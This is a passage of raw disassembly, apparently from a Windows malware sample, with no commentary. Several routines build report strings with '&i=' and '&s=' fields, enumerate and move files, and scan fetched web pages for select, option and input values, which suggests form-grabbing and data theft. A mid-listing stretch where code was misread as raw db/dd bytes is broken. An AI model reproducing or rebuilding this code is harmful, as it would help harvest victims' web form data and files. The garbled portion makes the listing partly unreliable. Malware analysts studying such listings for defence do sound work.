sub_40B850 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA15 proc near ; CODE XREF: sub_4048AF+A3�p
var_48 = byte ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi]
push 1
lea ecx, [ebp+var_48]
push ecx
push esi
xor ebx, ebx
call dword ptr [eax+30h]
test eax, eax
jnz short loc_40BA7D
mov eax, [ebp+var_40]
cmp eax, 0A00000h
ja short loc_40BA7D
cmp [ebp+var_3C], ebx
jnz short loc_40BA7D
push edi
push eax
mov [ebp+arg_4], eax
call sub_4092F9
mov edi, eax
cmp edi, ebx
pop ecx
jz short loc_40BA7C
mov eax, [esi]
lea ecx, [ebp+arg_4]
push ecx
push [ebp+arg_4]
push edi
push esi
call dword ptr [eax+0Ch]
test eax, eax
jnz short loc_40BA75
push [ebp+arg_4]
push edi
push [ebp+arg_0]
call sub_40B850
add esp, 0Ch
mov bl, al
loc_40BA75: ; CODE XREF: sub_40BA15+4D�j
push edi
call sub_409317
pop ecx
loc_40BA7C: ; CODE XREF: sub_40BA15+3B�j
pop edi
loc_40BA7D: ; CODE XREF: sub_40BA15+1B�j
; sub_40BA15+25�j ...
pop esi
mov al, bl
pop ebx
leave
retn
sub_40BA15 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA83 proc near ; CODE XREF: sub_403CC8+17B�p
; sub_407028+92�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push ebx
push 3
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
call sub_409BD4
add esp, 10h
test al, al
jz short loc_40BABE
push [ebp+var_C]
push [ebp+var_10]
push [ebp+arg_4]
call sub_40B850
mov bl, al
lea eax, [ebp+var_10]
push eax
call sub_409C8A
add esp, 10h
loc_40BABE: ; CODE XREF: sub_40BA83+1D�j
mov al, bl
pop ebx
leave
retn
sub_40BA83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BAC3 proc near ; DATA XREF: sub_40BC8E+EB�o
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
sub esp, 18h
push ebx
xor ebx, ebx
mov [eax], ebx
mov eax, [ebp+arg_C]
push esi
mov esi, [ebp+arg_0]
mov [eax], ebx
mov al, [esi+1]
mov cl, al
inc cl
test al, al
mov [esi+1], cl
jbe short loc_40BAEF
xor al, al
jmp loc_40BC88
; ---------------------------------------------------------------------------
loc_40BAEF: ; CODE XREF: sub_40BAC3+23�j
push edi
push ebx
push 3
lea edi, [esi+20Ch]
lea eax, [esi+2]
push edi
push eax
call sub_409BD4
add esp, 10h
test al, al
mov [esi], al
jz loc_40BC85
mov edx, [esi+210h]
cmp edx, 8
mov [ebp+var_4], ebx
jbe loc_40BC73
mov eax, [edi]
mov ecx, [eax]
lea ebx, [ecx-4]
cmp edx, ebx
jbe loc_40BC73
cmp edx, 0A00000h
jnb loc_40BC73
lea edx, [ebp+var_4]
push edx
push ecx
add eax, 4
push eax
call sub_409A6F
add esp, 0Ch
test eax, eax
mov [ebp+var_8], eax
jz loc_40BC82
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call sub_40A813
test al, al
pop ecx
pop ecx
jz loc_40BC73
mov eax, [edi]
mov ecx, [eax]
mov ebx, [ecx+eax+4]
mov eax, [esi+210h]
sub eax, 8
cmp ebx, eax
jnb loc_40BC73
push 2
push offset dword_4031E4
push [ebp+arg_4]
call sub_40934F
add esp, 0Ch
push dword_40FB2C
mov [ebp+arg_0], eax
call dword_40FD94 ; lstrlenA
push eax
push dword_40FB2C
push [ebp+arg_0]
call sub_40934F
push 3
push offset aI ; "&i="
push eax
call sub_40934F
mov [ebp+arg_0], eax
mov eax, dword_40FC1C
add eax, 44h
push 4
push eax
lea eax, [ebp+var_18]
push eax
call sub_409331
add esp, 24h
lea eax, [ebp+var_18]
push eax
mov [ebp+var_14], 0
call dword_40FD94 ; lstrlenA
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call sub_40934F
push 3
push offset aS ; "&s="
push eax
call sub_40934F
mov [ebp+arg_0], eax
push 0Ah
lea eax, [ebp+var_18]
push eax
push ebx
call sub_408F25
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call sub_40934F
push 3
push offset dword_4031E0
push eax
call sub_40934F
push [ebp+var_8]
push [ebp+var_4]
push eax
call sub_40934F
add esp, 48h
mov byte ptr [eax], 0
push [ebp+var_4]
call sub_409317
mov eax, [edi]
mov ecx, [eax]
lea eax, [ecx+eax+8]
push ebx
push eax
call sub_40936D
mov ecx, [ebp+arg_8]
add esp, 0Ch
test eax, eax
mov [ecx], eax
jnz short loc_40BC6A
mov [esi], al
jmp short loc_40BC85
; ---------------------------------------------------------------------------
loc_40BC6A: ; CODE XREF: sub_40BAC3+1A1�j
mov eax, [ebp+arg_C]
mov [eax], ebx
mov al, 1
jmp short loc_40BC87
; ---------------------------------------------------------------------------
loc_40BC73: ; CODE XREF: sub_40BAC3+59�j
; sub_40BAC3+68�j ...
cmp [ebp+var_8], 0
jz short loc_40BC82
push [ebp+var_4]
call sub_409317
pop ecx
loc_40BC82: ; CODE XREF: sub_40BAC3+90�j
; sub_40BAC3+1B4�j
mov byte ptr [esi], 1
loc_40BC85: ; CODE XREF: sub_40BAC3+47�j
; sub_40BAC3+1A5�j
xor al, al
loc_40BC87: ; CODE XREF: sub_40BAC3+1AE�j
pop edi
loc_40BC88: ; CODE XREF: sub_40BAC3+27�j
pop esi
pop ebx
leave
retn 10h
sub_40BAC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40BC8E proc near ; DATA XREF: sub_4086F4+95�o
; sub_419C1A+95�o
var_6F4 = dword ptr -6F4h
var_674 = byte ptr -674h
var_658 = dword ptr -658h
var_654 = dword ptr -654h
var_648 = byte ptr -648h
var_424 = byte ptr -424h
var_21C = byte ptr -21Ch
var_21B = byte ptr -21Bh
var_21A = byte ptr -21Ah
var_10 = byte ptr -10h
push ebp
lea ebp, [esp-74h]
sub esp, 674h
push ebx
lea eax, [ebp+74h+var_424]
push edi
push eax
call sub_409CBA
mov eax, dword_40FB34
pop ecx
push dword ptr [eax]
lea eax, [ebp+74h+var_424]
push eax
push eax
call dword_40FC8C
xor ebx, ebx
loc_40BCBF: ; CODE XREF: sub_40BC8E+14A�j
mov eax, dword_40FC1C
mov edi, [eax+58h]
jmp short loc_40BD14
; ---------------------------------------------------------------------------
loc_40BCC9: ; CODE XREF: sub_40BC8E+BC�j
push eax
call dword_40FE9C ; FindClose
lea eax, [ebp+74h+var_648]
push eax
lea eax, [ebp+74h+var_424]
push eax
lea eax, [ebp+74h+var_21A]
push eax
call dword_40FC8C
cmp [ebp+74h+var_654], ebx
jz short loc_40BCFB
cmp [ebp+74h+var_658], ebx
jz short loc_40BD5A
loc_40BCFB: ; CODE XREF: sub_40BC8E+63�j
lea eax, [ebp+74h+var_21A]
push eax
call sub_409B2C
mov [esp+680h+var_6F4], 3E8h
call dword_40FD68 ; Sleep
loc_40BD14: ; CODE XREF: sub_40BC8E+39�j
mov eax, dword_40FB34
push dword ptr [eax+190h]
lea eax, [ebp+74h+var_424]
push eax
lea eax, [ebp+74h+var_21A]
push eax
call dword_40FC8C
lea eax, [ebp+74h+var_674]
push eax
lea eax, [ebp+74h+var_21A]
push eax
call dword_40FE94 ; FindFirstFileW
cmp eax, 0FFFFFFFFh
jnz loc_40BCC9
mov eax, dword_40FC1C
mov edi, [eax+54h]
jmp short loc_40BDC9
; ---------------------------------------------------------------------------
loc_40BD5A: ; CODE XREF: sub_40BC8E+6B�j
lea eax, [ebp+74h+var_10]
push 10h
push eax
mov [ebp+74h+var_21C], bl
mov [ebp+74h+var_21B], bl
call sub_40A94C
lea eax, [ebp+74h+var_21C]
push eax
push ebx
push offset sub_40BAC3
push dword_40FABC
call sub_4063D8
add esp, 18h
test al, al
jz short loc_40BD9F
cmp [ebp+74h+var_21C], bl
mov [ebp+74h+var_21C], 1
jnz short loc_40BDA5
loc_40BD9F: ; CODE XREF: sub_40BC8E+100�j
mov [ebp+74h+var_21C], bl
loc_40BDA5: ; CODE XREF: sub_40BC8E+10F�j
lea eax, [ebp+74h+var_10]
push eax
call sub_409C8A
cmp [ebp+74h+var_21C], bl
pop ecx
jz short loc_40BDC9
lea eax, [ebp+74h+var_21A]
push eax
call sub_409B2C
pop ecx
mov edi, 3E8h
loc_40BDC9: ; CODE XREF: sub_40BC8E+CA�j
; sub_40BC8E+127�j
push edi
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz loc_40BCBF
dec dword_40FAB4
pop edi
pop ebx
add ebp, 74h
leave
retn 4
sub_40BC8E endp
; =============== S U B R O U T I N E =======================================
sub_40BDED proc near ; DATA XREF: sub_40C000+D7�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+224h]
mov ecx, [esi+228h]
sub ecx, eax
push ecx
mov ecx, [esi+214h]
add ecx, eax
push ecx
call sub_40A94C
pop ecx
pop ecx
push dword ptr [esi+21Ch]
call dword_40FE00 ; FlushFileBuffers
mov eax, [esi+228h]
mov [esi+224h], eax
mov al, 1
pop esi
retn 8
sub_40BDED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE2F proc near ; DATA XREF: sub_40C000+DC�o
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
sub esp, 10h
push ebx
xor ebx, ebx
mov [eax], ebx
mov eax, [ebp+arg_C]
push esi
mov esi, [ebp+arg_0]
mov [eax], ebx
mov eax, [esi+4]
cmp eax, ebx
lea ecx, [eax+1]
push edi
mov [esi+4], ecx
jnz loc_40BF60
cmp [esi+1], bl
jz short loc_40BEC7
mov eax, dword_40FB34
push dword ptr [eax+24h]
call sub_409B48
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_40BE78
loc_40BE71: ; CODE XREF: sub_40BE2F+96�j
; sub_40BE2F+BF�j
xor al, al
jmp loc_40BFF9
; ---------------------------------------------------------------------------
loc_40BE78: ; CODE XREF: sub_40BE2F+40�j
mov eax, dword_40FB34
push ebx
push ebx
push ebx
push ebx
push 8
push dword ptr [eax+30h]
call sub_4095AA
add esp, 18h
push 3
lea eax, [esi+8]
push eax
push dword ptr [esi+210h]
call dword_40FE68 ; MoveFileExW
push ebx
push ebx
test eax, eax
push ebx
setnz al
mov [esi], al
mov eax, dword_40FB34
push ebx
push 7
push dword ptr [eax+30h]
call sub_4095AA
push edi
call sub_409B7F
add esp, 1Ch
cmp [esi], bl
jz short loc_40BE71
loc_40BEC7: ; CODE XREF: sub_40BE2F+2C�j
push 80h
lea edi, [esi+8]
push edi
call dword_40FDB4 ; SetFileAttributesW
push 1
push 3
lea eax, [esi+214h]
push eax
push edi
call sub_409BD4
add esp, 10h
cmp al, bl
mov [esi], al
jz short loc_40BE71
push 2
push offset dword_4031E8
push [ebp+arg_4]
call sub_40934F
add esp, 0Ch
push dword_40FB2C
mov edi, eax
call dword_40FD94 ; lstrlenA
push eax
push dword_40FB2C
push edi
call sub_40934F
push 3
push offset aI ; "&i="
push eax
call sub_40934F
mov edi, eax
mov eax, dword_40FC1C
add eax, 44h
push 4
push eax
lea eax, [ebp+var_10]
push eax
call sub_409331
add esp, 24h
lea eax, [ebp+var_10]
push eax
mov [ebp+var_C], bl
call dword_40FD94 ; lstrlenA
push eax
lea eax, [ebp+var_10]
push eax
push edi
call sub_40934F
add esp, 0Ch
mov [eax], bl
loc_40BF60: ; CODE XREF: sub_40BE2F+23�j
mov eax, [esi+224h]
mov [esi+228h], eax
add eax, 4
cmp eax, [esi+218h]
mov byte ptr [esi], 1
mov byte ptr [ebp+arg_0+3], bl
jnb short loc_40BFF6
mov ecx, [esi+214h]
loc_40BF83: ; CODE XREF: sub_40BE2F+183�j
mov eax, [esi+228h]
cmp dword ptr [ecx+eax], 48414C4Ch
jnz short loc_40BFA2
mov edi, [ecx+eax+4]
cmp edi, 0A00000h
ja short loc_40BFF6
cmp edi, ebx
jnz short loc_40BFB6
loc_40BFA2: ; CODE XREF: sub_40BE2F+161�j
inc eax
mov [esi+228h], eax
add eax, 4
cmp eax, [esi+218h]
jb short loc_40BF83
jmp short loc_40BFF6
; ---------------------------------------------------------------------------
loc_40BFB6: ; CODE XREF: sub_40BE2F+171�j
add edi, 8
push edi
call sub_4092F9
cmp eax, ebx
pop ecx
mov ecx, [ebp+arg_8]
mov [ecx], eax
jnz short loc_40BFCD
mov [esi], bl
jmp short loc_40BFF6
; ---------------------------------------------------------------------------
loc_40BFCD: ; CODE XREF: sub_40BE2F+198�j
mov ebx, [ebp+arg_C]
mov [ebx], edi
mov eax, [esi+228h]
add eax, [esi+214h]
push edi
push eax
push dword ptr [ecx]
call sub_409331
mov eax, [ebx]
add esp, 0Ch
add [esi+228h], eax
mov byte ptr [ebp+arg_0+3], 1
loc_40BFF6: ; CODE XREF: sub_40BE2F+14C�j
; sub_40BE2F+16D�j ...
mov al, byte ptr [ebp+arg_0+3]
loc_40BFF9: ; CODE XREF: sub_40BE2F+44�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40BE2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40C000 proc near ; DATA XREF: sub_4086F4+84�o
; sub_419C1A+84�o
var_47C = byte ptr -47Ch
var_460 = dword ptr -460h
var_45C = dword ptr -45Ch
var_22C = byte ptr -22Ch
var_22B = byte ptr -22Bh
var_228 = dword ptr -228h
var_224 = byte ptr -224h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-74h]
sub esp, 47Ch
push ebx
push esi
call sub_40B4A0
push eax
mov [ebp+74h+var_1C], eax
lea eax, [ebp+74h+var_224]
push eax
call dword_40FD98 ; lstrcpyW
mov eax, dword_40FB34
push dword ptr [eax+1Ch]
lea eax, [ebp+74h+var_224]
push eax
call dword_40FDA4 ; lstrcatW
xor ebx, ebx
loc_40C03A: ; CODE XREF: sub_40C000+13E�j
mov eax, dword_40FC1C
mov esi, [eax+58h]
loc_40C042: ; CODE XREF: sub_40C000+B1�j
lea eax, [ebp+74h+var_47C]
push eax
lea eax, [ebp+74h+var_224]
push eax
mov [ebp+74h+var_22B], bl
call dword_40FE94 ; FindFirstFileW
cmp eax, 0FFFFFFFFh
jnz short loc_40C081
lea eax, [ebp+74h+var_47C]
push eax
push [ebp+74h+var_1C]
call dword_40FE94 ; FindFirstFileW
cmp eax, 0FFFFFFFFh
jz loc_40C12F
mov [ebp+74h+var_22B], 1
loc_40C081: ; CODE XREF: sub_40C000+5F�j
push eax
call dword_40FE9C ; FindClose
cmp [ebp+74h+var_45C], ebx
jz short loc_40C098
cmp [ebp+74h+var_460], ebx
jz short loc_40C0B3
loc_40C098: ; CODE XREF: sub_40C000+8E�j
cmp [ebp+74h+var_22B], bl
jnz loc_40C12F
lea eax, [ebp+74h+var_224]
push eax
call sub_409B2C
pop ecx
jmp short loc_40C042
; ---------------------------------------------------------------------------
loc_40C0B3: ; CODE XREF: sub_40C000+96�j
lea eax, [ebp+74h+var_18]
push 10h
push eax
mov [ebp+74h+var_22C], bl
mov [ebp+74h+var_228], ebx
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_4], ebx
call sub_40A94C
lea eax, [ebp+74h+var_22C]
push eax
push offset sub_40BDED
push offset sub_40BE2F
push dword_40FABC
call sub_4063D8
add esp, 18h
test al, al
jz short loc_40C102
cmp [ebp+74h+var_22C], bl
mov [ebp+74h+var_22C], 1
jnz short loc_40C108
loc_40C102: ; CODE XREF: sub_40C000+F1�j
mov [ebp+74h+var_22C], bl
loc_40C108: ; CODE XREF: sub_40C000+100�j
lea eax, [ebp+74h+var_18]
push eax
call sub_409C8A
cmp [ebp+74h+var_22C], bl
pop ecx
jz short loc_40C12F
lea eax, [ebp+74h+var_224]
push eax
call sub_409B2C
mov eax, dword_40FC1C
mov esi, [eax+54h]
pop ecx
loc_40C12F: ; CODE XREF: sub_40C000+74�j
; sub_40C000+9E�j ...
push esi
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz loc_40C03A
dec dword_40FAB4
pop esi
pop ebx
add ebp, 74h
leave
retn 4
sub_40C000 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+10h]
push edi
call dword_40FD94 ; lstrlenA
push dword ptr [ebp+0Ch]
mov [ebp-4], eax
call dword_40FD94 ; lstrlenA
push dword ptr [ebp+8]
mov ebx, eax
call dword_40FD94 ; lstrlenA
mov esi, eax
mov eax, [ebp-4]
add eax, edi
jmp short loc_40C18A
; ---------------------------------------------------------------------------
loc_40C184: ; CODE XREF: .text:0040C18C�j
cmp byte ptr [eax], 2Fh
jz short loc_40C18E
dec eax
loc_40C18A: ; CODE XREF: .text:0040C182�j
cmp eax, edi
ja short loc_40C184
loc_40C18E: ; CODE XREF: .text:0040C187�j
cmp eax, edi
jnz short loc_40C196
loc_40C192: ; CODE XREF: .text:0040C1B1�j
xor eax, eax
jmp short loc_40C20E
; ---------------------------------------------------------------------------
loc_40C196: ; CODE XREF: .text:0040C190�j
push 0
push 0
lea ecx, [ebp+10h]
push ecx
push ebx
push dword ptr [ebp+0Ch]
sub eax, edi
inc eax
push eax
push edi
call sub_408CFB
add esp, 1Ch
test al, al
jz short loc_40C192
lea eax, [esi+ebx+0Ah]
push eax
call sub_4092F9
push esi
push dword ptr [ebp+8]
mov edi, eax
push edi
call sub_409331
mov eax, [ebp+8]
add esp, 10h
cmp byte ptr [esi+eax-1], 2Fh
jz short loc_40C1E7
mov eax, [ebp+0Ch]
mov ecx, [ebp+10h]
cmp byte ptr [ecx+eax], 2Fh
jz short loc_40C1E7
mov byte ptr [edi+esi], 2Fh
inc esi
loc_40C1E7: ; CODE XREF: .text:0040C1D4�j
; .text:0040C1E0�j
mov eax, [ebp+10h]
mov ecx, ebx
sub ecx, eax
push ecx
mov ecx, [ebp+0Ch]
add eax, ecx
push eax
lea eax, [edi+esi]
push eax
call sub_409331
mov eax, edi
sub eax, [ebp+10h]
add esp, 0Ch
add eax, esi
mov byte ptr [eax+ebx], 0
mov eax, edi
loc_40C20E: ; CODE XREF: .text:0040C194�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push dword ptr [ebp+8]
call dword_40FD94 ; lstrlenA
mov ebx, [ebp+0Ch]
push ebx
mov edi, eax
call dword_40FD94 ; lstrlenA
test edi, edi
jz short loc_40C2AF
test eax, eax
jz short loc_40C2AF
lea esi, [eax+ebx]
jmp short loc_40C249
; ---------------------------------------------------------------------------
loc_40C23C: ; CODE XREF: .text:0040C24B�j
mov cl, [esi]
cmp cl, 3Fh
jz short loc_40C24D
cmp cl, 2Fh
jz short loc_40C24D
dec esi
loc_40C249: ; CODE XREF: .text:0040C23A�j
cmp esi, ebx
ja short loc_40C23C
loc_40C24D: ; CODE XREF: .text:0040C241�j
; .text:0040C246�j
cmp esi, ebx
jz short loc_40C2AF
cmp byte ptr [esi], 2Fh
jz short loc_40C2AF
lea eax, [eax+edi+0Ah]
push eax
inc esi
call sub_4092F9
test eax, eax
pop ecx
mov [ebp-4], eax
jz short loc_40C2AF
mov ebx, [ebp+8]
push edi
push ebx
push eax
call sub_409331
add esp, 0Ch
lea eax, [edi+ebx]
jmp short loc_40C289
; ---------------------------------------------------------------------------
loc_40C27C: ; CODE XREF: .text:0040C28B�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_40C28D
cmp cl, 2Fh
jz short loc_40C28D
dec eax
loc_40C289: ; CODE XREF: .text:0040C27A�j
cmp eax, ebx
ja short loc_40C27C
loc_40C28D: ; CODE XREF: .text:0040C281�j
; .text:0040C286�j
cmp eax, ebx
jz short loc_40C298
cmp byte ptr [eax], 3Fh
mov cl, 26h
jz short loc_40C29A
loc_40C298: ; CODE XREF: .text:0040C28F�j
mov cl, 3Fh
loc_40C29A: ; CODE XREF: .text:0040C296�j
mov ebx, [ebp-4]
lea eax, [ebx+edi]
mov [eax], cl
push esi
inc eax
push eax
call dword_40FDA0 ; lstrcpyA
mov eax, ebx
jmp short loc_40C2BB
; ---------------------------------------------------------------------------
loc_40C2AF: ; CODE XREF: .text:0040C231�j
; .text:0040C235�j ...
push 0FFFFFFFFh
push dword ptr [ebp+8]
call sub_40A747
pop ecx
pop ecx
loc_40C2BB: ; CODE XREF: .text:0040C2AD�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40C2C0: ; DATA XREF: sub_40E286+152�o
; sub_41F7AC+152�o
push ebp
mov ebp, esp
sub esp, 41Ch
push dword ptr [ebp+8]
lea eax, [ebp-41Ch]
push eax
call dword_40FDA0 ; lstrcpyA
lea eax, [ebp-41Ch]
push eax
call dword_40FD94 ; lstrlenA
loc_40C2E6: ; CODE XREF: .text:0040C2F5�j
dec eax
jz loc_40C50C
cmp byte ptr [ebp+eax-41Ch], 2Fh
jnz short loc_40C2E6
mov ecx, dword_40FB34
push ebx
push dword ptr [ecx+174h]
lea eax, [ebp+eax-41Bh]
push eax
call dword_40FDA0 ; lstrcpyA
mov eax, dword_40FB34
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push dword ptr [eax+38h]
call dword_40FB3C
cmp eax, ebx
jz loc_40C50B
push edi
push ebx
push 0FFFFh
lea ecx, [ebp-14h]
push ecx
lea ecx, [ebp-41Ch]
push ecx
push eax
call sub_405C60
mov edi, eax
add esp, 14h
cmp edi, ebx
jz loc_40C50A
push ebx
push ebx
lea eax, [ebp-8]
push eax
push edi
push dword ptr [ebp-14h]
push 9
push offset aSelect ; "*<select "
call sub_408CFB
add esp, 1Ch
test al, al
jz loc_40C501
mov eax, [ebp-8]
mov ecx, [ebp-14h]
push esi
mov [ebp-0Ch], ebx
lea esi, [eax+ecx]
sub edi, eax
mov [ebp-1], bl
jmp short loc_40C38E
; ---------------------------------------------------------------------------
loc_40C388: ; CODE XREF: .text:0040C4C5�j
mov edi, [ebp-18h]
mov esi, [ebp-10h]
loc_40C38E: ; CODE XREF: .text:0040C386�j
push 0
push 0
lea eax, [ebp-8]
push eax
push edi
push esi
push 12h
push offset aOptionSelected ; "*<option selected"
call sub_408CFB
add esp, 1Ch
test al, al
; ---------------------------------------------------------------------------
db 0Fh
dw 2984h
db 1
assume es:nothing
public start
start db 2 dup(0), 3
dd 7D2BF875h, 1D840FF8h, 80000001h, 4743E3Eh, 0F7754F46h
dd 840FFF85h, 10Ch, 3E0C8D46h, 7589F13Bh, 73C68BF0h, 3C38800Ah
dd 3B400574h, 3BF672C1h, 0ED840FC1h, 8B000000h, 81CE2BC8h
dd 200F9h, 0DD8F0F00h, 8B000000h, 6AF04Dh, 708D006Ah, 0C6C82B01h
dd 458D0000h, 0F90350F8h, 106A5657h
; ---------------------------------------------------------------------------
push offset aInputValue ; "*<input *value=\""
call sub_408CFB
add esp, 1Ch
test al, al
jz loc_40C4D8
add esi, [ebp-8]
sub edi, [ebp-8]
mov eax, esi
lea ecx, [esi+edi]
cmp esi, ecx
mov [ebp-18h], edi
jnb short loc_40C445
loc_40C43B: ; CODE XREF: .text:0040C443�j
cmp byte ptr [eax], 22h
jz short loc_40C445
inc eax
cmp eax, ecx
jb short loc_40C43B
loc_40C445: ; CODE XREF: .text:0040C439�j
; .text:0040C43E�j
cmp eax, ecx
jz loc_40C4D8
mov ecx, eax
sub ecx, esi
cmp ecx, 200h
jg short loc_40C4D8
mov byte ptr [eax], 0
movzx eax, byte ptr [ebp-1]
push esi
inc eax
push eax
push dword ptr [ebp-10h]
push eax
mov eax, dword_40FB34
push dword ptr [eax+17Ch]
lea eax, [ebp-41Ch]
push 400h
push eax
call dword_40FC88
lea esi, [eax+ebx]
mov [ebp-1Ch], eax
lea eax, [esi+0Ah]
push eax
push dword ptr [ebp-0Ch]
call sub_40A91F
mov edi, eax
add esp, 24h
test edi, edi
jz short loc_40C4CD
push dword ptr [ebp-1Ch]
lea eax, [ebp-41Ch]
push eax
lea eax, [edi+ebx]
push eax
mov [ebp-0Ch], edi
call sub_409331
add esp, 0Ch
inc byte ptr [ebp-1]
cmp byte ptr [ebp-1], 3
mov ebx, esi
mov byte ptr [edi+ebx], 0
jb loc_40C388
jmp short loc_40C4D8
; ---------------------------------------------------------------------------
loc_40C4CD: ; CODE XREF: .text:0040C49D�j
push dword ptr [ebp-0Ch]
call sub_409317
pop ecx
xor ebx, ebx
loc_40C4D8: ; CODE XREF: .text:0040C423�j
; .text:0040C447�j ...
test ebx, ebx
pop esi
jz short loc_40C501
push dword ptr [ebp-0Ch]
mov eax, dword_40FB34
add ebx, 64h
push ebx
push dword ptr [eax+178h]
push 2
call sub_40B583
push dword ptr [ebp-0Ch]
call sub_409317
add esp, 14h
loc_40C501: ; CODE XREF: .text:0040C36E�j
; .text:0040C4DB�j
push dword ptr [ebp-14h]
call sub_409317
pop ecx
loc_40C50A: ; CODE XREF: .text:0040C34D�j
pop edi
loc_40C50B: ; CODE XREF: .text:0040C328�j
pop ebx
loc_40C50C: ; CODE XREF: .text:0040C2E7�j
push dword ptr [ebp+8]
call sub_409317
pop ecx
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_40C519 proc near ; CODE XREF: sub_404222+AD�p
xor eax, eax
push offset dword_4102F8
mov dword_4102EC, eax
mov dword_4102E8, eax
mov dword_4102F0, eax
mov dword_4102F4, eax
call dword_40FE80 ; InitializeCriticalSection
retn
sub_40C519 endp
; =============== S U B R O U T I N E =======================================
sub_40C53B proc near ; CODE XREF: sub_40C6BF+F�p
; sub_40CBC4+18�p
arg_0 = dword ptr 4
push esi
mov esi, dword_4102E8
xor eax, eax
test esi, esi
jbe short loc_40C565
mov ecx, dword_4102EC
add ecx, 4
loc_40C551: ; CODE XREF: sub_40C53B+28�j
mov edx, [ecx]
cmp edx, [esp+4+arg_0]
jnz short loc_40C55D
test edx, edx
jnz short loc_40C568
loc_40C55D: ; CODE XREF: sub_40C53B+1C�j
inc eax
add ecx, 38h
cmp eax, esi
jb short loc_40C551
loc_40C565: ; CODE XREF: sub_40C53B+B�j
or eax, 0FFFFFFFFh
loc_40C568: ; CODE XREF: sub_40C53B+20�j
pop esi
retn
sub_40C53B endp
; =============== S U B R O U T I N E =======================================
sub_40C56A proc near ; CODE XREF: sub_40C6BF+1D�p
; sub_40D058+B1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, dword_4102E8
push esi
xor edx, edx
test eax, eax
push edi
jbe short loc_40C59A
mov ecx, dword_4102EC
lea esi, [ecx+4]
loc_40C580: ; CODE XREF: sub_40C56A+21�j
cmp dword ptr [esi], 0
jz short loc_40C58F
inc edx
add esi, 38h
cmp edx, eax
jb short loc_40C580
jmp short loc_40C59A
; ---------------------------------------------------------------------------
loc_40C58F: ; CODE XREF: sub_40C56A+19�j
mov esi, edx
imul esi, 38h
add esi, ecx
mov edi, edx
jnz short loc_40C5CB
loc_40C59A: ; CODE XREF: sub_40C56A+B�j
; sub_40C56A+23�j
inc eax
imul eax, 38h
push eax
push offset dword_4102EC
call sub_40B3C4
test al, al
pop ecx
pop ecx
jnz short loc_40C5B4
or eax, 0FFFFFFFFh
jmp short loc_40C5E4
; ---------------------------------------------------------------------------
loc_40C5B4: ; CODE XREF: sub_40C56A+43�j
mov edi, dword_4102E8
inc dword_4102E8
mov esi, edi
imul esi, 38h
add esi, dword_4102EC
loc_40C5CB: ; CODE XREF: sub_40C56A+2E�j
push 38h
push esi
call sub_40A94C
mov eax, [esp+10h+arg_0]
mov [esi+4], eax
mov eax, [esp+10h+arg_4]
pop ecx
mov [esi], eax
pop ecx
mov eax, edi
loc_40C5E4: ; CODE XREF: sub_40C56A+48�j
pop edi
pop esi
retn
sub_40C56A endp
; =============== S U B R O U T I N E =======================================
sub_40C5E7 proc near ; CODE XREF: .text:0040C66B�p
test byte ptr [esi], 1
jz short loc_40C617
push dword ptr [esi+20h]
call sub_409317
push dword ptr [esi+14h]
call sub_409317
push dword ptr [esi+28h]
call sub_409317
push dword ptr [esi+2Ch]
call sub_409317
push dword ptr [esi+30h]
call sub_409317
add esp, 14h
loc_40C617: ; CODE XREF: sub_40C5E7+3�j
test byte ptr [esi], 2
jz short loc_40C637
push dword ptr [esi+10h]
call dword_40FB40
push dword ptr [esi+0Ch]
call dword_40FB40
push dword ptr [esi+8]
call dword_40FB40
loc_40C637: ; CODE XREF: sub_40C5E7+33�j
mov eax, [esi]
test al, 30h
jz short loc_40C65A
test al, 20h
jz short loc_40C651
mov eax, [esi+34h]
test eax, eax
jz short loc_40C651
push dword ptr [eax+14h]
call sub_409317
pop ecx
loc_40C651: ; CODE XREF: sub_40C5E7+58�j
; sub_40C5E7+5F�j
push dword ptr [esi+34h]
call sub_409317
pop ecx
